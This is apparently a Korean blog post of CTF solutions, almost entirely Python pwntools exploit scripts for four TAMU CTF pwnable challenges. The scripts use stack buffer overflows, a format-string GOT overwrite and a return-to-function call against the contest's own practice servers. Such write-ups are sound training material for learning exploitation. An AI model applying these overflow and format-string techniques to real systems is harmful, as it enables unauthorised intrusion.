TAMU CTF - pwnable(1~4) $bash

pwn 1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from pwn import *
from time import *
 
context(arch='i386', os='linux')
r = remote('pwn.ctf.tamu.edu', 4322)
 
flag = 0xCA11AB1E
payload  = 'a'*0x1b
payload += p32(flag)
 
r.sendline(payload)
 
print r.recv(1024)
sleep(0.3)
 
 
Colored by Color Scripter
cs

pwn 2

1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *
s = remote("pwn.ctf.tamu.edu",4321)
elf = ELF("./pwn2")
 
flag = 0x0804854B
 
payload  = "A"*140
payload += p32(flag)
 
s.sendline(payload)
print s.recv(1024)
 
 
Colored by Color Scripter
cs

pwn 3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from pwn import *
from time import *
 
s = remote("pwn.ctf.tamu.edu", 4323)
s = process('./pwn3')
 
exit_got = 0x804a01c
print_flag = 0x80485ab - 4
 
payload  = p32(exit_got)
payload += '%%%dx' % print_flag
payload += '%%%d$n' % 4
 
 
print s.recvuntil('Enter a word to be echoed:')
s.sendline(payload)
print s.recvuntil('This function has been deprecated')
 
flag = s.recv(1024)
print flag
 
# 3번은..그냥 (python ~~~ |cat --) | nc 로 해결.
# 익스 코드는 payload를 가지고 gdb 에서 검증.
 
Colored by Color Scripter
cs

pwn 4

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from pwn import *
s = remote("web.ctf.tamu.edu",4324)
#s.recvuntil("I require an input:")
 
sys = 0x80484d9 # <flag_func+14>
flag = 0x0804A028 # string meun
 
payload  = "A"*16
payload += p32(sys)
payload += p32(flag)
 
s.sendline(payload)
print s.recv(1024)
 
Colored by Color Scripter
cs

저작자표시 비영리 변경금지

'0x0400 : Wargame > 0x0410 : CTF' 카테고리의 다른 글

2017 Hust CTF write up (0)	2017.05.28
defcon2016 - [rev]baby-re (0)	2017.05.21
RCTF - [misc]intoU (0)	2017.05.21
DEFCON_2017 - SmashMe (0)	2017.05.08
Defcon 23 - babycmd (0)	2017.01.12

« 2024/11 »
일	월	화	수	목	금	토
					1	2
3	4	5	6	7	8	9
10	11	12	13	14	15	16
17	18	19	20	21	22	23
24	25	26	27	28	29	30

'0x0400 : Wargame > 0x0410 : CTF' 카테고리의 다른 글

티스토리툴바